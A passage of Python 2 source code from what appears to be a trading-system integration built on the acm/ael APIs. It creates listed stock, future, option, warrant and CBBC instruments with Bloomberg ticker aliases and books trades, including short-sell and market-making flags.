aliase.Alias(bb_ticker)
break
ins_new.Commit()
# Create Additional Infos
CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode, 'OPTION', insUnderlying_mktId)
'''
bb_ticker = ''
if insCcy == 'HKD':
bb_ticker = localcode + ' HK Option'
elif insCcy in ('CNY', 'CNH'):
bb_ticker = localcode + ' CN Option'
if bb_ticker != '':
createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker)
'''
insid = ins_new.Name()
return insid
def createStockOptionInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, localcode, insName, insULType, ins_underlying_insid, insUnderlying_mktId):
insid = ''
#prodId = localcode + '@' + insMic
#print 'I1', insCcy, 'OPTION', localcode, insMaturity, ins_underlying_insid, insPointValue, insULType, insOptionType, insStrike
#bb_ticker = formatBBTicker(insCcy, 'OPTION', localcode, insMaturity, ins_underlying_insid, insPointValue, insULType, insOptionType, insStrike)
bb_ticker = formatBBTicker(insMic, insCcy, 'OPTION', localcode, insMaturity, ins_underlying_insid, insPointValue, insULType, insOptionType, insStrike)
if bb_ticker == '':
return insid
prodId = bb_ticker
insid = getInsidByBBTicker(bb_ticker)
if insid != '':
CreateInsAdditionalInfo(insid, insMic, insDesc, insName, localcode, 'OPTION', insUnderlying_mktId)
if bb_ticker != '':
# Create BB_TICKER alias
createInstrumentAlias(insid, 'BB_TICKER', bb_ticker)
return insid
insTemplateId = 'Template Option'
ins_template = acm.FInstrument[insTemplateId]
ins_new = ins_template.Clone()
ins_new.Generic(False)
ins_new.Name(prodId)
ins_new.Underlying(ins_underlying_insid)
ins_new.ExpiryDate(insMaturity)
ins_new.Currency(insCcy)
#print 'I'
if insOptionType.upper() == 'CALL' or insOptionType.upper() == 'C':
ins_new.IsCallOption(True)
else:
ins_new.IsCallOption(False)
#print 'J'
if insExecType.upper() == 'EUROPEAN' or insExecType.upper() == 'E':
ins_new.ExerciseType('European')
else:
ins_new.ExerciseType('American')
if insDeliveryType.upper() == 'CASH' or insDeliveryType.upper() == 'C':
ins_new.SettlementType('Cash')
else:
ins_new.SettlementType('Physical Delivery')
ins_new.StrikeCurrency(insCcy)
ins_new.StrikePrice(float(insStrike))
ins_new.ContractSize(float(insPointValue))
# Underlying Type
insUnderlyingInsType = ins_new.Underlying().InsType()
ins_new.ValuationGrpChlItem('Listed Equity Option')
ins_new.Commit()
# Create Additional Infos
CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode, 'OPTION', insUnderlying_mktId)
if bb_ticker != '':
createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker)
insid = ins_new.Name()
return insid
def getInstrument(tradeId, way, qty, price, insLocalCode,
trdCcy, insMic, insCcy, insDesc, insProdType,
insMaturity, insPointValue, insStrike, insOptionType,
insExecType, insBullBear, insBarrier, insOtc, insDeliveryType,
insUlLocalCode, insULProdType, insULMic, insULCcy, insULDesc,
trdChannel, insIssueSize, insIssueDate, insBarrierType, issuer_ptyid,
insName, insULName, insUnderlying_mktId, warrantParity,
mssd_underlying, mssd_callput, mssd_exp_month, mssd_strike, mssd_pointval,
fo_system, new_arr_ins, errdict):
newIns = False
trd_insid = ''
insProdType = insProdType.upper()
insULProdType = insULProdType.upper()
insOptionType = insOptionType.upper()
insExecType = insExecType.upper()
insBullBear = insBullBear.upper()
insOtc = insOtc.upper()
insDeliveryType = insDeliveryType.upper()
if insProdType == 'STOCK':
#print 'louis999'
ins_insid = getInstrumentByMapping(insLocalCode, insMic)
if ins_insid == '':
ins_new_insid = createStockInstr(insCcy, insMic, insDesc, insName, insLocalCode)
if ins_new_insid != '':
trd_insid = ins_new_insid
new_arr_ins.append(ins_new_insid)
newIns = True
else:
acm_ins = acm.FInstrument[ins_insid]
CreateInsAdditionalInfo(acm_ins.Name(), insMic, insDesc, insName, insLocalCode, insProdType, '')
#bb_ticker = formatBBTicker(insCcy, insProdType, insLocalCode)
bb_ticker = formatBBTicker(insMic, insCcy, insProdType, insLocalCode)
if bb_ticker != '':
createInstrumentAlias(ins_insid, 'BB_TICKER', bb_ticker)
trd_insid = ins_insid
newIns = False
elif insProdType == 'FUTURE':
#print 'AAA'
if fo_system == 'MSSD':
#print 'BBB'
ins_insid = getInstrumentByIndAttributes(insMic, insProdType, mssd_underlying, mssd_callput, mssd_exp_month, mssd_strike, mssd_pointval)
#print 'CCC'
else:
ins_insid = getInstrumentByMapping(insLocalCode, insMic)
#print 'louis889', insProdType, ins_insid
if ins_insid == '':
# get Underlying
ins_underlying_insid = getInstrumentByMapping(insUlLocalCode, insULMic)
if ins_underlying_insid == '':
if insULProdType == 'STOCK':
ins_underlying_insid = createStockInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
elif insULProdType == 'INDEX':
ins_underlying_insid = ''
#ins_underlying_insid = createEquityIndexInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
if ins_underlying_insid != '':
new_arr_ins.append(ins_underlying_insid)
else:
acm_ins = acm.FInstrument[ins_underlying_insid]
CreateInsAdditionalInfo(acm_ins.Name(), insULMic, insULDesc, insULName, insUlLocalCode, insULProdType, '')
#ul_bb_ticker = formatBBTicker(insULCcy, insULProdType, insUlLocalCode)
ul_bb_ticker = formatBBTicker(insULMic, insULCcy, insULProdType, insUlLocalCode)
if ul_bb_ticker != '':
createInstrumentAlias(ins_underlying_insid, 'BB_TICKER', ul_bb_ticker)
# Create Future
if ins_underlying_insid != '':
ins_new_insid = ''
if insULProdType == 'STOCK':
ins_new_insid = createStockFutureInstr(insCcy, insMic, insDesc, insLocalCode, insMaturity, insPointValue, insName, ins_underlying_insid, insULProdType, insUnderlying_mktId, insDeliveryType)
elif insULProdType == 'INDEX':
ins_new_insid = createIndexFutureInstr(insCcy, insMic, insDesc, insLocalCode, insMaturity, insPointValue, insName, ins_underlying_insid, insULProdType, insUnderlying_mktId)
if ins_new_insid != '':
trd_insid = ins_new_insid
new_arr_ins.append(ins_new_insid)
newIns = True
else:
acm_ins = acm.FInstrument[ins_insid]
CreateInsAdditionalInfo(acm_ins.Name(), insMic, insDesc, insName, insLocalCode, insProdType, insUnderlying_mktId)
#bb_ticker = formatBBTicker(insCcy, insProdType, insLocalCode, insMaturity, acm_ins.Underlying().Name(), acm_ins.ContractSize(), insULProdType)
bb_ticker = formatBBTicker(insMic, insCcy, insProdType, insLocalCode, insMaturity, acm_ins.Underlying().Name(), acm_ins.ContractSize(), insULProdType)
if bb_ticker != '':
createInstrumentAlias(ins_insid, 'BB_TICKER', bb_ticker)
trd_insid = ins_insid
newIns = False
elif insProdType == 'OPTION':
#print 'B'
if insULProdType == 'INDEX':
if fo_system == 'MSSD':
ins_insid = getInstrumentByIndAttributes(insMic, insProdType, mssd_underlying, mssd_callput, mssd_exp_month, mssd_strike, mssd_pointval)
else:
ins_insid = getInstrumentByMapping(insLocalCode, insMic)
else:
ins_insid = getInstrumentByMapping(insLocalCode, insMic)
#print 'C', ins_insid, insULProdType
if ins_insid == '':
# get Underlying
ins_underlying_insid = getInstrumentByMapping(insUlLocalCode, insULMic)
if ins_underlying_insid == '':
if insULProdType == 'STOCK':
ins_underlying_insid = createStockInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
elif insULProdType == 'INDEX':
ins_underlying_insid = ''
#ins_underlying_insid = createEquityIndexInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
if ins_underlying_insid != '':
new_arr_ins.append(ins_underlying_insid)
else:
acm_ins = acm.FInstrument[ins_underlying_insid]
CreateInsAdditionalInfo(acm_ins.Name(), insULMic, insULDesc, insULName, insUlLocalCode, insULProdType, '')
#ul_bb_ticker = formatBBTicker(insULCcy, insULProdType, insUlLocalCode)
ul_bb_ticker = formatBBTicker(insULMic, insULCcy, insULProdType, insUlLocalCode)
if ul_bb_ticker != '':
createInstrumentAlias(ins_underlying_insid, 'BB_TICKER', ul_bb_ticker)
# Create Option
if ins_underlying_insid != '':
ins_new_insid = ''
if insULProdType == 'STOCK':
#print 'G'
ins_new_insid = createStockOptionInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, insLocalCode, insName, insULProdType, ins_underlying_insid, insUnderlying_mktId)
#print 'H'
elif insULProdType == 'INDEX':
#print 'D'
ins_new_insid = createIndexOptionInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, insLocalCode, insName, insULProdType, ins_underlying_insid, insUnderlying_mktId)
#print 'E'
if ins_new_insid != '':
trd_insid = ins_new_insid
new_arr_ins.append(ins_new_insid)
newIns = True
else:
acm_ins = acm.FInstrument[ins_insid]
CreateInsAdditionalInfo(acm_ins.Name(), insMic, insDesc, insName, insLocalCode, insProdType, insUnderlying_mktId)
#bb_ticker = formatBBTicker(insCcy, insProdType, insLocalCode, insMaturity, acm_ins.Underlying().Name(), acm_ins.ContractSize(), insULProdType, insOptionType, insStrike)
bb_ticker = formatBBTicker(insMic, insCcy, insProdType, insLocalCode, insMaturity, acm_ins.Underlying().Name(), acm_ins.ContractSize(), insULProdType, insOptionType, insStrike)
if bb_ticker != '':
createInstrumentAlias(ins_insid, 'BB_TICKER', bb_ticker)
trd_insid = ins_insid
newIns = False
elif insProdType == 'WARRANT':
#print 'F'
ins_insid = getInstrumentByMapping(insLocalCode, insMic)
if ins_insid == '':
#print 'G'
ins_underlying_insid = getInstrumentByMapping(insUlLocalCode, insULMic)
#print 'H', ins_underlying_insid
if ins_underlying_insid == '':
#print 'I'
# Create Underlying Stock
if insULProdType == 'STOCK':
ins_underlying_insid = createStockInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
elif insULProdType == 'INDEX':
ins_underlying_insid = ''
#ins_underlying_insid = createEquityIndexInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
if ins_underlying_insid != '':
new_arr_ins.append(ins_underlying_insid)
else:
#print 'J'
acm_ins = acm.FInstrument[ins_underlying_insid]
#print acm_ins.Name(), insULMic, insULDesc, insULName, insUlLocalCode, insULProdType
CreateInsAdditionalInfo(acm_ins.Name(), insULMic, insULDesc, insULName, insUlLocalCode, insULProdType, '')
#print 'K'
#ul_bb_ticker = formatBBTicker(insULCcy, insULProdType, insUlLocalCode)
ul_bb_ticker = formatBBTicker(insULMic, insULCcy, insULProdType, insUlLocalCode)
#print 'L'
if ul_bb_ticker != '':
createInstrumentAlias(ins_underlying_insid, 'BB_TICKER', ul_bb_ticker)
# Create Warrant
if ins_underlying_insid != '':
ins_new_insid = createWarrantInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, \
insExecType, insStrike, insMic, insDesc, insLocalCode, insIssueSize, insIssueDate, \
issuer_ptyid, insName, ins_underlying_insid, warrantParity)
if ins_new_insid != '':
trd_insid = ins_new_insid
new_arr_ins.append(ins_new_insid)
newIns = True
else:
acm_ins = acm.FInstrument[ins_insid]
CreateInsAdditionalInfo(acm_ins.Name(), insMic, insDesc, insName, insLocalCode, insProdType, '')
UpdateWarrantInfo(acm_ins.Name(), insIssueSize)
#bb_ticker = formatBBTicker(insCcy, insProdType, insLocalCode)
bb_ticker = formatBBTicker(insMic, insCcy, insProdType, insLocalCode)
if bb_ticker != '':
createInstrumentAlias(ins_insid, 'BB_TICKER', bb_ticker)
trd_insid = ins_insid
newIns = False
elif insProdType == 'CBBC':
ins_insid = getInstrumentByMapping(insLocalCode, insMic)
if ins_insid == '':
ins_underlying_insid = getInstrumentByMapping(insUlLocalCode, insULMic)
if ins_underlying_insid == '':
# Create Underlying Stock
if insULProdType == 'STOCK':
ins_underlying_insid = createStockInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
elif insULProdType == 'INDEX':
ins_underlying_insid = ''
#ins_underlying_insid = createEquityIndexInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
if ins_underlying_insid != '':
new_arr_ins.append(ins_underlying_insid)
else:
acm_ins = acm.FInstrument[ins_underlying_insid]
CreateInsAdditionalInfo(acm_ins.Name(), insULMic, insULDesc, insULName, insUlLocalCode, insULProdType, '')
#ul_bb_ticker = formatBBTicker(insULCcy, insULProdType, insUlLocalCode)
ul_bb_ticker = formatBBTicker(insULMic, insULCcy, insULProdType, insUlLocalCode)
if ul_bb_ticker != '':
createInstrumentAlias(ins_underlying_insid, 'BB_TICKER', ul_bb_ticker)
# Create CBBC
if ins_underlying_insid != '':
ins_new_insid = createCBBCInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, \
insExecType, insStrike, insMic, insDesc, insLocalCode, insBullBear, insBarrier, \
insIssueSize, insIssueDate, insBarrierType, issuer_ptyid, insName, ins_underlying_insid, \
warrantParity)
if ins_new_insid != '':
trd_insid = ins_new_insid
new_arr_ins.append(ins_new_insid)
newIns = True
else:
acm_ins = acm.FInstrument[ins_insid]
CreateInsAdditionalInfo(acm_ins.Name(), insMic, insDesc, insName, insLocalCode, insProdType, '')
UpdateWarrantInfo(acm_ins.Name(), insIssueSize)
#bb_ticker = formatBBTicker(insCcy, insProdType, insLocalCode)
bb_ticker = formatBBTicker(insMic, insCcy, insProdType, insLocalCode)
if bb_ticker != '':
createInstrumentAlias(ins_insid, 'BB_TICKER', bb_ticker)
trd_insid = ins_insid
newIns = False
return trd_insid, newIns
def UpdateWarrantInfo(insid, issueSize):
acm_ins = acm.FInstrument[insid]
if acm_ins.TotalIssued() != issueSize:
acm_ins_c = acm_ins.Clone()
acm_ins_c.TotalIssued(issueSize)
acm_ins.Apply(acm_ins_c)
acm_ins.Commit()
def createTrade(asofdate, trd_insid, tradeId, way, qty, price, trdCcy, DEFAULT_PF, DEFAULT_CPTY, \
DEFAULT_BKR, DEFAULT_ACQ, DEFAULT_STATUS, DEFAULT_TRADER, channel, \
trdAcquirer, trdCounterparty, trdPortfolio, trd_td, trd_vd, mss_acc_id, trd_ae_aces_grp_cde, \
fo_userid, timestamp, errdict):
#return 1234, 'Success'
trdnbr = -1
tradeSituation = 'Fail'
#print 'trdPortfolio', trdPortfolio
#print 'trdCounterparty', trdCounterparty
#print 'trdAcquirer', trdAcquirer
# Portfolio
if trdPortfolio == '':
pf = ael.Portfolio[DEFAULT_PF]
#print 'louis1', DEFAULT_PF, pf
if pf != None:
prfid = pf.prfid.strip()
else:
prfid = ''
else:
prfid = trdPortfolio
#print 'prfid100', prfid
#return false
# Counterparty
if trdCounterparty == '':
ptyid = getCounterparty(DEFAULT_CPTY)
else:
ptyid = trdCounterparty
# Broker
#broker_ptyid = getBroker(DEFAULT_BKR)
# Acquirer
if trdAcquirer == '':
acq_ptyid = getAcquirer(DEFAULT_ACQ)
else:
acq_ptyid = trdAcquirer
# B/S
if way.upper() in ('B', 'S'):
buysell = way.upper()
else:
buysell = ''
# Instrument
ael_ins = ael.Instrument[trd_insid]
if ael_ins != None:
insid = ael_ins.insid.strip()
else:
insid = ''
curr = ael.Instrument[trdCcy]
if curr != None:
curr_insid = curr.insid.strip()
else:
curr_insid = ''
#Trader
traderId = DEFAULT_TRADER
#print 'louis111', insid, prfid, curr_insid, ptyid, acq_ptyid, buysell, traderId
if insid != '' and prfid != '' and curr_insid != '' and ptyid != '' and acq_ptyid != '' \
and buysell != '' and traderId != '':
ael_ins = ael.Instrument[insid]
ael_trd = ael.Trade.new(ael_ins)
ael_trd.prfnbr = ael.Portfolio[prfid]
ael_trd.acquirer_ptynbr = ael.Party[acq_ptyid]
ael_trd.counterparty_ptynbr = ael.Party[ptyid]
#ael_trd.broker_ptynbr = ael.Party[broker_ptyid]
ael_trd.curr = ael.Instrument[curr_insid]
if trd_td == '':
# Horizon
#td = ael.date(asofdate).to_ymd()
yy = timestamp[0:4]
mm = timestamp[4:6]
dd = timestamp[6:8]
hh = timestamp[9:11]
mi = timestamp[11:13]
ss = timestamp[13:15]
td_tm = datetime.datetime(int(yy), int(mm), int(dd), int(hh), int(mi), int(ss))
else:
# MSS
td = ael.date(trd_td).to_ymd()
#print td
td_tm = datetime.datetime(td[0], td[1], td[2], 0, 0, 0)
ael_trd.time = int(time.mktime(td_tm.timetuple()))
# use instrument currency calendar to skip holiday
if trd_vd == '':
if trd_td == '':
ael_trd.value_day = ael.date(asofdate).add_banking_day(ael_ins.curr, ael_ins.spot_banking_days_offset)
else:
ael_trd.value_day = ael.date(trd_td).add_banking_day(ael_ins.curr, ael_ins.spot_banking_days_offset)
else:
ael_trd.value_day = ael.date(trd_vd)
ael_trd.acquire_day = ael_trd.value_day
if way == 'B':
ael_trd.quantity = abs(float(qty))
else:
ael_trd.quantity = -abs(float(qty))
ael_trd.price = float(price)
ael_trd.premium = quoteTo(ael_ins, ael_trd.acquire_day, ael_ins.quote_type, ael_trd.price) * ael_trd.quantity
ael_trd.status = DEFAULT_STATUS
ael_trd.type = 'Normal'
tradeId_f = formatFOTradeId(tradeId, channel)
tradeId_1 = tradeId_f[0:63]
tradeId_2 = tradeId_f[63:126]
tradeId_3 = tradeId_f[126:189]
if tradeId_1.strip() != '':
FOTradeIdAddinfo1 = ael.AdditionalInfo.new(ael_trd)
FOTradeIdAddinfo1.addinf_specnbr = 'FO Trade Id_1'
FOTradeIdAddinfo1.value = tradeId_1
if tradeId_2.strip() != '':
FOTradeIdAddinfo2 = ael.AdditionalInfo.new(ael_trd)
FOTradeIdAddinfo2.addinf_specnbr = 'FO Trade Id_2'
FOTradeIdAddinfo2.value = tradeId_2
if tradeId_3.strip() != '':
FOTradeIdAddinfo3 = ael.AdditionalInfo.new(ael_trd)
FOTradeIdAddinfo3.addinf_specnbr = 'FO Trade Id_3'
FOTradeIdAddinfo3.value = tradeId_3
FOSystemAddinfo = ael.AdditionalInfo.new(ael_trd)
FOSystemAddinfo.addinf_specnbr = 'Trade Source'
FOSystemAddinfo.value = channel
if mss_acc_id.strip() != '':
MSSACCAddinfo = ael.AdditionalInfo.new(ael_trd)
MSSACCAddinfo.addinf_specnbr = 'MSS_Account'
MSSACCAddinfo.value = mss_acc_id
if channel == 'Horizon':
mss_acc_id = mapMssAccCode(prfid, ael_ins.insid.strip())
#print 'Z1', mss_acc_id
if mss_acc_id.strip() != '':
MSSACCAddinfo = ael.AdditionalInfo.new(ael_trd)
MSSACCAddinfo.addinf_specnbr = 'MSS_Account'
MSSACCAddinfo.value = mss_acc_id
if trd_ae_aces_grp_cde.strip() != '':
HorizonPfAddinfo = ael.AdditionalInfo.new(ael_trd)
HorizonPfAddinfo.addinf_specnbr = 'Horizon Portfolio'
HorizonPfAddinfo.value = trd_ae_aces_grp_cde
'''
if channel == 'Horizon':
HorizonPfAddinfo = ael.AdditionalInfo.new(ael_trd)
HorizonPfAddinfo.addinf_specnbr = 'Horizon Portfolio'
HorizonPfAddinfo.value = trd_ae_aces_grp_cde
else:
AEACESAddinfo = ael.AdditionalInfo.new(ael_trd)
AEACESAddinfo.addinf_specnbr = 'AE_Aces_Code'
AEACESAddinfo.value = trd_ae_aces_grp_cde
'''
if fo_userid.strip() != '':
FOUserIdAddinfo = ael.AdditionalInfo.new(ael_trd)
FOUserIdAddinfo.addinf_specnbr = 'Horizon User Id'
FOUserIdAddinfo.value = fo_userid
ael_trd.trader_usrnbr = ael.User[traderId]
ael_trd.commit()
ael.poll()
trdnbr = ael_trd.trdnbr
tradeSituation = 'Success'
else:
if insid == '':
errdict = addDictError('Instrument', 'Invalid instrument of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if prfid == '':
errdict = addDictError('Portfolio', 'Invalid portfolio of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if ptyid == '':
errdict = addDictError('Counterparty', 'Invalid counterparty of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if curr_insid == '':
errdict = addDictError('Trade Ccy', 'Invalid trade currency of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if acq_ptyid == '':
errdict = addDictError('Acquirer', 'Invalid acquirer of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if buysell == '':
errdict = addDictError('BuySell', 'Invalid buy/sell of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if traderId == '':
errdict = addDictError('Trader', 'Invalid trader of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
return trdnbr, tradeSituation
def createTrade_mm(asofdate, trd_insid, tradeId, way, qty, price, trdCcy, DEFAULT_PF, DEFAULT_CPTY, \
DEFAULT_BKR, DEFAULT_ACQ, DEFAULT_STATUS, DEFAULT_TRADER, channel, \
trdAcquirer, trdCounterparty, trdPortfolio, trd_td, trd_vd, mss_acc_id, trd_ae_aces_grp_cde, \
fo_userid, timestamp, market_making, short_sell, short_sell_mssacc, errdict):
trdnbr = -1
tradeSituation = 'Fail'
short_sell = short_sell.upper()
print short_sell, 'short_sell'
bool_short_sell = IsShortSellTrade(short_sell)
#print 'trdPortfolio', trdPortfolio
#print 'trdCounterparty', trdCounterparty
#print 'trdAcquirer', trdAcquirer
# Portfolio
if trdPortfolio == '':
pf = ael.Portfolio[DEFAULT_PF]
if pf != None:
prfid = pf.prfid.strip()
else:
prfid = ''
else:
prfid = trdPortfolio
# Counterparty
if trdCounterparty == '':
ptyid = getCounterparty(DEFAULT_CPTY)
else:
ptyid = trdCounterparty
# Broker
#broker_ptyid = getBroker(DEFAULT_BKR)
# Acquirer
if trdAcquirer == '':
acq_ptyid = getAcquirer(DEFAULT_ACQ)
else:
acq_ptyid = trdAcquirer
# B/S
if way.upper() in ('B', 'S'):
buysell = way.upper()
else:
buysell = ''
# Instrument
ael_ins = ael.Instrument[trd_insid]
if ael_ins != None:
insid = ael_ins.insid.strip()
else:
insid = ''
curr = ael.Instrument[trdCcy]
if curr != None:
curr_insid = curr.insid.strip()
else:
curr_insid = ''
#Trader
traderId = DEFAULT_TRADER
#print 'louis111', insid, prfid, curr_insid, ptyid, acq_ptyid, buysell, traderId
if insid != '' and prfid != '' and curr_insid != '' and ptyid != '' and acq_ptyid != '' \
and buysell != '' and traderId != '':
ael_ins = ael.Instrument[insid]
ael_trd = ael.Trade.new(ael_ins)
ael_trd.prfnbr = ael.Portfolio[prfid]
ael_trd.acquirer_ptynbr = ael.Party[acq_ptyid]
ael_trd.counterparty_ptynbr = ael.Party[ptyid]
ael_trd.curr = ael.Instrument[curr_insid]
if trd_td == '':
# Horizon
yy = timestamp[0:4]
mm = timestamp[4:6]
dd = timestamp[6:8]
hh = timestamp[9:11]
mi = timestamp[11:13]
ss = timestamp[13:15]
td_tm = datetime.datetime(int(yy), int(mm), int(dd), int(hh), int(mi), int(ss))
else:
# MSS
td = ael.date(trd_td).to_ymd()
#print td
td_tm = datetime.datetime(td[0], td[1], td[2], 0, 0, 0)
#print td_tm
ael_trd.time = int(time.mktime(td_tm.timetuple()))
# use instrument currency calendar to skip holiday
#print 'time', ael_trd.time
if trd_vd == '':
if trd_td == '':
ael_trd.value_day = ael.date(asofdate).add_banking_day(ael_ins.curr, ael_ins.spot_banking_days_offset)
else:
ael_trd.value_day = ael.date(trd_td).add_banking_day(ael_ins.curr, ael_ins.spot_banking_days_offset)
else:
ael_trd.value_day = ael.date(trd_vd)
#print 'value_day', ael_trd.value_day
ael_trd.acquire_day = ael_trd.value_day
if way == 'B':
ael_trd.quantity = abs(float(qty))
else:
ael_trd.quantity = -abs(float(qty))
ael_trd.price = float(price)
ael_trd.premium = quoteTo(ael_ins, ael_trd.acquire_day, ael_ins.quote_type, ael_trd.price) * ael_trd.quantity
ael_trd.status = DEFAULT_STATUS
ael_trd.type = 'Normal'
tradeId_f = formatFOTradeId(tradeId, channel)
tradeId_1 = tradeId_f[0:63]
tradeId_2 = tradeId_f[63:126]
tradeId_3 = tradeId_f[126:189]
if tradeId_1.strip() != '':
FOTradeIdAddinfo1 = ael.AdditionalInfo.new(ael_trd)
FOTradeIdAddinfo1.addinf_specnbr = 'FO Trade Id_1'
FOTradeIdAddinfo1.value = tradeId_1
if tradeId_2.strip() != '':
FOTradeIdAddinfo2 = ael.AdditionalInfo.new(ael_trd)
FOTradeIdAddinfo2.addinf_specnbr = 'FO Trade Id_2'
FOTradeIdAddinfo2.value = tradeId_2
if tradeId_3.strip() != '':
FOTradeIdAddinfo3 = ael.AdditionalInfo.new(ael_trd)
FOTradeIdAddinfo3.addinf_specnbr = 'FO Trade Id_3'
FOTradeIdAddinfo3.value = tradeId_3
FOSystemAddinfo = ael.AdditionalInfo.new(ael_trd)
FOSystemAddinfo.addinf_specnbr = 'Trade Source'
FOSystemAddinfo.value = channel
if mss_acc_id.strip() != '':
MSSACCAddinfo = ael.AdditionalInfo.new(ael_trd)
MSSACCAddinfo.addinf_specnbr = 'MSS_Account'
MSSACCAddinfo.value = mss_acc_id
print channel, 'channel'
if channel == 'Horizon':
mss_acc_id = mapMssAccCode_withshortsell(prfid, ael_ins.insid.strip(), short_sell)
if mss_acc_id.strip() != '':
MSSACCAddinfo = ael.AdditionalInfo.new(ael_trd)
MSSACCAddinfo.addinf_specnbr = 'MSS_Account'
#if short_sell in ('SHORT', 'MARKET_MAKER'):
'''
if bool_short_sell:
MSSACCAddinfo.value = short_sell_mssacc
else:
MSSACCAddinfo.value = mss_acc_id
'''
MSSACCAddinfo.value = mss_acc_id
else:
#if short_sell in ('SHORT', 'MARKET_MAKER'):
if bool_short_sell:
MSSACCAddinfo = ael.AdditionalInfo.new(ael_trd)
MSSACCAddinfo.addinf_specnbr = 'MSS_Account'
MSSACCAddinfo.value = short_sell_mssacc
if trd_ae_aces_grp_cde.strip() != '':
HorizonPfAddinfo = ael.AdditionalInfo.new(ael_trd)
HorizonPfAddinfo.addinf_specnbr = 'Horizon Portfolio'
HorizonPfAddinfo.value = trd_ae_aces_grp_cde
'''
if channel == 'Horizon':
HorizonPfAddinfo = ael.AdditionalInfo.new(ael_trd)
HorizonPfAddinfo.addinf_specnbr = 'Horizon Portfolio'
HorizonPfAddinfo.value = trd_ae_aces_grp_cde
else:
AEACESAddinfo = ael.AdditionalInfo.new(ael_trd)
AEACESAddinfo.addinf_specnbr = 'AE_Aces_Code'
AEACESAddinfo.value = trd_ae_aces_grp_cde
'''
if fo_userid.strip() != '':
FOUserIdAddinfo = ael.AdditionalInfo.new(ael_trd)
FOUserIdAddinfo.addinf_specnbr = 'Horizon User Id'
FOUserIdAddinfo.value = fo_userid
if market_making.strip() == 'MMM':
MMAddinfo = ael.AdditionalInfo.new(ael_trd)
MMAddinfo.addinf_specnbr = 'Market Making'
MMAddinfo.value = 'Yes'
#if short_sell in ('SHORT', 'MARKET_MAKER'):
if bool_short_sell:
ShortSellAddinfo = ael.AdditionalInfo.new(ael_trd)
ShortSellAddinfo.addinf_specnbr = 'Short Sell'
ShortSellAddinfo.value = 'Yes'
ael_trd.trader_usrnbr = ael.User[traderId]
ael_trd.commit()
ael.poll()
trdnbr = ael_trd.trdnbr
tradeSituation = 'Success'
else:
if insid == '':
errdict = addDictError('Instrument', 'Invalid instrument of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if prfid == '':
errdict = addDictError('Portfolio', 'Invalid portfolio of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if ptyid == '':
errdict = addDictError('Counterparty', 'Invalid counterparty of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if curr_insid == '':
errdict = addDictError('Trade Ccy', 'Invalid trade currency of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if acq_ptyid == '':
errdict = addDictError('Acquirer', 'Invalid acquirer of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if buysell == '':
errdict = addDictError('BuySell', 'Invalid buy/sell of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if traderId == '':
